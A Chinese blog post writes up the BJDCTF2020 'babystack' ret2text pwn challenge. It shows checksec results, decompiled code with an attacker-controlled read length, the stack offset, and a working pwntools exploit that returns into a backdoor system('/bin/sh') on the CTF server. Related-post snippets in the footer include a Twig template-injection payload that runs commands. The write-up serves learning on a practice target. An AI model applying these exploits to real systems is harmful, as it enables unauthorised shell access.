CTF-Show-ret2text(BJDCTF2020,babystack)

已于 2024-04-12 03:17:35 修改
阅读量2.8k 收藏 1
点赞数
分类专栏: CTFShow刷题 文章标签: 安全 pwn 安全漏洞
于 2021-12-06 15:38:56 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_49666584/article/details/121747481
版权

0x00

checksec:

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAS2lkTGlvbmVy,size_10,color_FFFFFF,t_70,g_se,x_16

 NX enabled,不能直接写入shellcode

No canary found,No PIE,能直接栈溢出

猜想题目应该是让我们直接栈溢出

0x01

丢进IDA看下代码

int  main()
{
  char buf[12]; 
  size_t nbytes; 

  LODWORD(nbytes) = 0;
  puts("**********************************");
  puts("*     Welcome to the BJDCTF!     *");
  puts("* And Welcome to the bin world!  *");
  puts("*  Let's try to pwn the world!   *");
  puts("* Please told me u answer loudly!*");
  puts("[+]Are u ready?");
  puts("[+]Please input the length of your name:");
  scanf("%d", &nbytes);
  puts("[+]What's u name?");
  read(0, buf, (unsigned int)nbytes);//可溢出
  return 0;
}

int backdoor()     //后门函数
{
  system("/bin/sh");
  return 1LL;
}

存在后门函数,而且可以看到read函数的可写入大小参数nbytes是由我们控制的,那么只要我们输入个大点的数即可实现栈溢出。

0x02

-0000000000000010 buf             db 12 dup(?)
-0000000000000004 nbytes          dq ?
+0000000000000004                 db ? ; undefined
+0000000000000005                 db ? ; undefined
+0000000000000006                 db ? ; undefined
+0000000000000007                 db ? ; undefined
+0000000000000008  r              db 8 dup(?)

变量buf到栈底距离为(0x10+0x8),后门函数backdoor地址为0x4006E6

.text:00000000004006E6 backdoor        proc near

则EXP为:

from pwn import *

p=remote("pwn.challenge.ctf.show",28085)
#p=process("./ret2text")

backdoor=0x4006E6
offset=0x10+0x8
payload=b"A"*offset+p64(backdoor)
p.recvuntil("Please input the length of your name:")
p.sendline(b'100') //这里的值不能太大
p.recvuntil("What's u name?")
p.sendline(payload)
p.interactive()

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAS2lkTGlvbmVy,size_20,color_FFFFFF,t_70,g_se,x_16

 

 

饭恩
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTF-misc工具2-CTF-Tools-masterV1.3.7
08-17
内容概要: CTF-Tools-master是一个专注于密码编码识别与解码的工具,能自动推断密码的编码类型,并进行解码。 适用人群: 该工具主要适用于参加CTF竞赛的选手,以及对密码编码算法感兴趣的信息安全从业人员。 使用场景: 在CTF竞赛中,可利用该工具自动识别编码类型并解码,快速解决misc类别的密码题目。 其他说明: 该工具具备智能判断密码编码类型的功能,大大减少手工判断和重复尝试的时间,使密码解码更为便捷高效。
ctfshow 01栈溢出之ret2text
Cfoxer的博客
02-21 308
file查看文件为64位,同时checksec表明开启了NX保护,所以排除re2shellcode办法,再根据题目提示,锁定目标re2test。根据上下s计算,其大小为0x80(转化十进制128)而在main函数中,我们关注welcome函数。明确目标要替换返回到ctfshow函数。汇编模式下可查看其起始地址为38。查看其变量s大小进行覆盖。
PWN · ret2text】[BJDCTF 2020]babystack
Mr_Fmnwon的博客
04-20 730
作为pwn新手,尽可能在刷题中,记录、学习一些通用的知识点,因此wp是少不了的。本题是一道简单的ret2text
攻防世界babystack(pwn1)——glibc_all_in_one初体验
weixin_48066554的博客
05-14 1312
攻防世界babystack(pwn1)——glibc_all_in_one初体验 文章目录攻防世界babystack(pwn1)——glibc_all_in_one初体验引入初步分析1、checksec2、伪代码分析3、栈分析解题思路1、泄露canary3、get shellexp本地libc运行尝试尝试1尝试2尝试3尝试4(重大进展) 引入 ​ 好久没做pwn题了,找了道简单的ret2libc做做,顺便尝试解决一些历史遗留问题 (其实就是让pwn题使用本地的libc的问题,省流:有突破性进展但没有完全解决
pwn基本ROP——ret2text
turtlesd的博客
04-25 816
ret2text环境原理漏洞分析利用`checksec [file_name]`指令获取可执行文件的保护措施开放情况利用IDA32位进行调试利用pwndbg获取偏移量payload 环境 ret2text 原理 控制主函数的return返回到文件函数中自带的system函数的地址,从而获得最高权限 漏洞分析 利用checksec [file_name]指令获取可执行文件的保护措施开放情况 命令: checksec ret2text 可以看到,该可执行文件是32位的,仅开启了NX堆栈不可执行保护。 也就是
PWN · IntegerOverflow & ret2text】[BJDCTF 2020]babystack2.0
Mr_Fmnwon的博客
05-27 891
整数溢出漏洞——对于有/无符号数,长/短位宽转换时机器码的变换策略所指。整数溢出一般与其他堆栈溢出相结合,然而其中的内容其实远不止这些,还需要深层次刷题,进一步掌握了解整数溢出。
ctf-2017-release:BSidesSF CTF 2017版本
05-28
ctf-2017 2017 BSidesSF CTF面临的挑战 内置的 , , , , 在本地应对挑战 您可以使用docker在本地运行所有挑战。 docker-compose build && docker-compose up -d 挑战将在http://localhost:PORT提供,基于...
CTF-Pwn-[BJDCTF 2nd]rci
01-09
CTF-Pwn-[BJDCTF 2nd]rci 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 ...
CTF-100题.-天天练习-学习
11-01
CTF-100题.-----------------天天练习------------------学习 100小题,试例练习
ctf-tools-linux-master.zip
06-22
ctf集成工具包-linux版
BUUCTF [BJDCTF2020] Cookie is so stable
Senimo
01-03 411
BUUCTF [BJDCTF2020] Cookie is so stable 考点: Twig模版注入 {{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}} 首先启动环境: 其中导航栏包括Flag和Hint页面,依次点击查看,首先是Hint页面: 查看网页源码,得到: <h3>Welcome to BJDCTF 2020.Happy Game!</h3>
CTF】bjdctf_2020_babystack 1
凉水的博客
01-21 1232
解题思路: 1 先反编译: undefined8 main(void) { undefined local_18 [12]; uint local_c; setvbuf(stdout,(char *)0x0,2,0); setvbuf(stdin,(char *)0x0,1,0); local_c = 0; puts("**********************************"); puts("* Welcome to the BJDCTF! *
BJDCTF2020--web-复现
ChenZIDu的博客
02-21 2714
BJDCTF2020 未完待续 Buu ZJCTF,就这? 看到这题名字还是很不爽的,毕竟我也是个浙江人,不过zjctf,有一说一确实。 BUU上和源题好像有点差别。 进题放出源码: <?php error_reporting(0); $text = $_GET["text"]; $file = $_GET["file"]; if(isset($text)&&(file_g...
CTF】BUUCTF-bjdctf_2020_babystack1
weixin_53394081的博客
03-06 345
PWN
[BJDCTF2020]EasySearch
pakho_C的博客
07-29 190
这里用到shtml,HTML是静态的,而shtml基于SSI技术,当有服务器端可执行脚本时被当作一种动态编程语言,所以可以注入,也可以用来远程命令执行。只要密码的md5值的前6位为6d0bc1即可登陆成功。所以只需要将username设置为payload即可。一个登陆页面,尝试了弱口令爆破注入无果。扫描目录发现index.php.swp。得到密码为2020666。接着看到shtml页面。...
BUU pwn 刷题
qq_36495104的博客
05-19 1456
这里基本都是栈溢出题,没什么技术含量,只作为记录 [第五空间2019 决赛]PWN5 查看保护 开启了canary和栈不可执行保护 IDA反编译得到main函数 int __cdecl main(int a1) { unsigned int v1; // eax int fd; // ST14_4 int result; // eax char nptr; // [esp+4h] [ebp-80h] char buf; // [esp+14h] [ebp-70h] unsigned
BUUCTF pwn wp 11 - 15
fa1c4的blog
08-17 394
ciscn_2019_n_8 int __cdecl main(int argc, const char **argv, const char **envp) { int v4; // [esp-14h] [ebp-20h] int v5; // [esp-10h] [ebp-1Ch] var[13] = 0; var[14] = 0; init(); puts("What's your name?"); __isoc99_scanf("%s", var, v4, v5);
BUUCTF-Crypto刷题记录
Georgeiweb的博客
10-18 1562
BUUCTF-Crypto刷题记录 签到-y1ng 题目:welcome to BJDCTF 1079822948 QkpEe1czbGMwbWVfVDBfQkpEQ1RGfQ== 解题思路:密文后边有等号,很有可能是base 64所以用工具尝试 所以答案为flag{W3lc0me_T0_BJDCTF} password 题目:姓名:张三 生日:19900315 key格式为key{xxxxxxxxxx} 解题思路:没有什么可以看出的标志,所以尝试着,姓名缩写加生日 所以答案刚好为:flag{zs1990
NSSCTF Pwn Page 1 - 2
红叶的博客
03-14 1547
NSSCTF Pwn 第一页到第二页全部题目解析。 刷了大概一个月的NSSCTF,对Pwn的理解更高了,虽然也没高到哪去。
ctf-qsnctf此地无银三百
最新发布
02-20
ctf-qsnctf是一个CTF(Capture The Flag)比赛平台,它提供了一系列的网络安全挑战,旨在帮助参与者提升网络安全技能和解决问题的能力。在ctf-qsnctf平台上,参与者可以通过解决各种类型的题目来获取旗帜(flag),并提交给平台进行验证。 "此地无银三百"是ctf-qsnctf平台上的一道题目,它的名称可能是一个提示,暗示着解题的思路。具体的解题方法和答案我无法透露,因为这会破坏比赛的公平性和乐趣。如果你对这道题目感兴趣,我建议你在ctf-qsnctf平台上注册账号并参与比赛,通过自己的努力和思考来解决问题。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值